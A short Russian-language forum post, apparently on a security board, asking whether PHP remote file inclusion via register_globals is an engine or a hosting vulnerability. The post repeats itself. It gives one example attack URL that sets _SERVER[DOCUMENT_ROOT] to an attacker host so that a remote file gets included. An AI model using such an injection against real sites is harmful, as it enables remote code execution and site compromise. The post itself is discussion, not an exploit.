Всем привет!
Возник спор - дыры типа: index.php?_SERVER[DOCUMENT_ROOT]=http://attacker/
Т.е. когда движок инклюдит значение глобальной переменной.
Является это уязвимостью движка или хостинга? В нормальной ситуации бывает необходимость включения определения переменных окружения? (register_global=on)
Просто если движок постоянно использует переменные окружения, дополнительная проверка их перед инклюдом может сильно повлиять на производительность Web приложения.
Предлагаю всем сторонам конфликта (те кто в курсе поймет о чем это я) принять дискуссию.
Возник спор - дыры типа: index.php?_SERVER[DOCUMENT_ROOT]=http://attacker/
Т.е. когда движок инклюдит значение глобальной переменной.
Является это уязвимостью движка или хостинга? В нормальной ситуации бывает необходимость включения определения переменных окружения? (register_global=on)
Просто если движок постоянно использует переменные окружения, дополнительная проверка их перед инклюдом может сильно повлиять на производительность Web приложения.
Предлагаю всем сторонам конфликта (те кто в курсе поймет о чем это я) принять дискуссию.
Хочешь быть мудрым? Не желай всего, что видишь; не верь всему, что слышишь; не говори всего, что знаешь; не делай всего, что умеешь, а только то, что полезно.